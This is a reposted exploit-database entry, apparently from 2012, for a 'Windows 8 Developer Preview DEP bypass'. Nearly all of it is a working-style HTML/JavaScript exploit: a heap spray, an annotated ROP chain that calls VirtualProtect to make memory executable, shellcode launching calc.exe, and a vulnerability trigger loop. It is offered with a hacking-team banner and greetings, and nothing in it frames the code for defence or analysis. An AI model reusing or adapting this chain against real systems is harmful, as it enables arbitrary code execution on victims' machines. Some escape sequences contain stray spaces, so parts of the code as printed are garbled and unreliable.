Windows 8 Developer Preview DEP bypass
来源:http://r00tw0rm.com 作者:Angel 发布时间:2012-06-14
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm Angel Injection member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+] Windows 8 Developer Preview DEP bypass [-] Found by Angel Injection [-] Link: www.microsoft.com [-] Security -::RISK: High [-] platforms: Windows [-] http://1337day.com http://r00tw0rm.com http://i313.cc [-] Greetz to 1337day.com(r0073r) Team i313.cc(Sn!PEr_R00T,Lion) r00tw0rm.com Team (CrosS And All Members) What Is Going On??
Note: the listing below is reproduced from http://www.dis9.com/windows-dep-bypass.html; it is a repost, not a new finding by this site.
<html> <!-- ROP completed---> <head> <Title>Windows 8 Calc payload</title> <script type="text/javascript"> function ignite() { var carpet = 0x200; var vftable = unescape("\x00% u0c10"); var pLand = "% u00fd% u0c10"; var pShell = "% u0000% u0c10"; var oldProt = "% u0000% u0c10";
var heap = unescape("% u0101% u0102" +"% u0008% u0c10" +"% u0105% u0106" +"% u10c2% u7c34"//"% u0107% u0108" pop ecx;pop ecx;ret +"% u0109% u010a"// +"% u3134% u6d32"//"% u010b% u010c"//"% u6643% u6d6a" // mov eax,[esi] +"% u787f% u6d32"//"% u010d% u010e"// xchg eax,esi;aam 0ff;dec ecx;ret +"% u7b72% u6d83"//"% u010f% u0111" // pop edx;ret +"% u0000% u0c10"//% u0112% u0113" // will be popped in edx // +"% u2a30% u6d7f"//"% u0114% u0115" // mov ecx,esi;call [edx+50] +pLand//"% u0116% u0117" // Address in shellcode to land change it accordingly +"% ue8d4% u6d7f"//"% u0118% u0119" // mov [ecx],eax;pop ebp;ret +"% u011a% u011b"// will be popped in ebp +"% u1b02% u7c34"//"% u011c% u011d" // dec ecx;ret +"% u1b02% u7c34"//"% u011e% u011f" // dec ecx;ret +"% u1b02% u7c34"//"% u0120% u0121" // dec ecx;ret +"% u1b02% u7c34"//"% u0122% u0123" // dec ecx;ret +"% u4edc% u7c34"//"% u0122% u0123" // pop eax;ret +oldProt//"% u0124% u0125" // pOldProtection +"% ue8d4% u6d7f"//"% u0126% u0127" // mov [ecx],eax;pop ebp;ret +"% u4edb% u7c34"//"% u0128% u0129" // pop ebx;pop eax;ret // needed in initial phase. +"% u1b02% u7c34"//"% u012a% u012b" // dec ecx;ret +"% u1b02% u7c34"//"% u012c% u012d" // dec ecx;ret +"% u4edb% u7c34"//"% u012e% u012f" // pop ebx;pop eax;ret +"% u2643% u7c34"//"% u0130% u0131" // xchg eax,esp;pop edi;add byte ptr ds:[eax],al;pop ecx,ret +"% u0040% u0000"//"% u0132% u0133" // newProptection = PAGE_READ_WRITE_EXECUTE +"% u1b02% u7c34"//"% u0134% u0135" // dec ecx;ret +"% u1b02% u7c34"//"% u0136% u0137" // dec ecx;ret +"% ue8d4% u6d7f"//"% u0138% u0139" // mov [ecx],eax;pop ebp;ret +"% u013a% u013b"// will be popped in ebp +"% u1b02% u7c34"//"% u013c% u013d" // dec ecx;ret +"% u1b02% u7c34"//"% u013e% u013f" // dec ecx;ret +"% u1b02% u7c34"//"% u0140% u0141" // dec ecx;ret +"% u1b02% u7c34"//"% u0142% u0143" // dec ecx;ret
+"% u4edc% u7c34"//"% u0144% u0145" // pop eax;ret +"% u0000% u0010"//"% u0146% u0147" // Size +"% ue8d4% u6d7f"//"% u0148% u0149" // mov [ecx],eax;pop ebp;ret +"% u014a% u014b"// Will be popped in ebp. +"% u1b02% u7c34"//"% u014c% u014d" // dec ecx;ret +"% u1b02% u7c34"//"% u014e% u014f" // dec ecx;ret +"% u1b02% u7c34"//"% u0150% u0151" // dec ecx;ret +"% u1b02% u7c34"//"% u0152% u0153" // dec ecx;ret
+"% u4edc% u7c34"//"% u0144% u0145" // pop eax;ret +pShell//"% u0146% u0147" // Address Of Shellcode block to change protection. +"% ue8d4% u6d7f"//"% u0148% u0149" // mov [ecx],eax;pop ebp;ret +"% u014a% u014b"// Will be popped in ebp. /* +"% u1b02% u7c34"//"% u014c% u014d" // dec ecx;ret +"% u1b02% u7c34"//"% u014e% u014f" // dec ecx;ret +"% u1b02% u7c34"//"% u0150% u0151" // dec ecx;ret +"% u1b02% u7c34"//"% u0152% u0153" // dec ecx;ret */ +"% u4cc1% u7c34"//"% u0154% u0155" // pop eax;ret +"% u9611% u7c34"//"% u0156% u0157" // will be popped in eax. pop edi;pop ebx;pop ebp;ret +"% u347a% u7c34"//"% u0158% u0159" // push esi;push edi;call eax +"% u4edc% u7c34"//"% u015a% u015b" // pop eax;ret +"% u00e0% u0c10"//"% u015c% u015d" // will be popped in eax.
/* Need to fix the ebp for proper landing on shellcode */ +"% uc420% u6d99"// dec ebp;ret +"% uc420% u6d99"// dec ebp;ret +"% uc420% u6d99"// dec ebp;ret +"% uc420% u6d99"// dec ebp;ret
+"% u1f0a% u7c34"//"% u015e% u015f" // mov esp,ecx;mov ecx[eax];mov eax,[eax+4];push eax;ret +"% u0160% u0161" +"% u28dd% u7c35"//"% u0162% u0163" // VirtualProtect +"% u0164% u0165" +"% u0166% u0167" +"% u0168% u0169" +"% u016a% u016b" +"% u016c% u016d" ) /* Shellcode : */ +unescape("% u9090% u9090% u9090% u9090" +"% u585b" // pop ebx;pop eax; +"% u0a05% u0a13% u9000" // add eax,0a130a +"% u008b" // mov eax,[eax] +"% u056a" // push 05 +"% uc581% u0128% u0000" // add ebp,114 +"% u9055" // push ebp;nop +"% u1505% u04d6% u9000" // add eax,4d615 +"% ud0ff" // call eax +"% uBBBB% uCCCC% uDDDD% uEEEE" /* command: */ +"% u6163% u636c% u652e% u6578% u0000% ucccc" // calc.exe ); var vtable = unescape("\x04% u0c10"); while(vtable.length < 0x10000) {vtable += vtable;} var heapblock = heap+vtable.substring(0,0x10000/2-heap.length*2); while (heapblock.length<0x80000) {heapblock += heap+heapblock;} var finalspray = heapblock.substring(0,0x80000 - heap.length - 0x24/2 - 0x4/2 - 0x2/2); var spray = new Array(); for (var iter=0;iter<carpet;iter++){ spray[iter] = finalspray+heap; } /* vulnerability trigger : */ var arrobject = [0x444444444444]; for(;true;){(arrobject[0])++;} } </script> </head> <body> <applet src="test.class" width=10 height=10></applet> <input type=button value="Ignite" onclick="ignite()" /> </body> </html>